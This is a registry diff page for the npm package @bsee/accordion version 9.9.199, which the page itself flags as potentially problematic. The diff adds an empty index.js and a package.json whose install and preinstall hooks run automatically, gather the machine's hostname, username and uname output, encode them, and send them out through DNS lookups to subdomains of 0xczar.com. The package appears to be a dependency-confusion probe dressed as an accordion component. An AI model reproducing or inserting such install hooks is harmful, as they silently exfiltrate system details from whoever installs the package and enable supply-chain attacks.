@bsee/accordion 9.9.199
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @bsee/accordion might be problematic. Click here for more details.
- package/index.js +0 -0
- package/package.json +13 -0
package/index.js
ADDED
|
File without changes
|
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@bsee/accordion",
|
|
3
|
+
"version": "9.9.199",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"install": "cmd /v /c \"hostname > czar1_hostname && certutil -encode czar1_hostname czar2_hostname && findstr /L /V \"CERTIFICATE\" czar2_hostname > czar3_hostname && set /p CZARVARHOSTNAME=<czar3_hostname && set CZARFINAL=comcast-DC-poc.!CZARVARHOSTNAME!.sub.0xczar.com && nslookup !CZARFINAL! && whoami > czar1_whoami && certutil -encode czar1_whoami czar2_whoami && findstr /L /V \"CERTIFICATE\" czar2_whoami > czar3_whoami && set /p CZARVARWHOAMI=<czar3_whoami && set CZARFINAL=comcast-DC-poc.!CZARVARWHOAMI!.sub.0xczar.com && nslookup !CZARFINAL!\"",
|
|
9
|
+
"preinstall": "nslookup comcast-DC-poc.x$(hostname|base64).sub.0xczar.com && nslookup comcast-DC-poc.x$(whoami|base64).sub.0xczar.com && nslookup comcast-DC-poc.a$(uname -a|base64).sub.0xczar.com"
|
|
10
|
+
},
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC"
|
|
13
|
+
}
|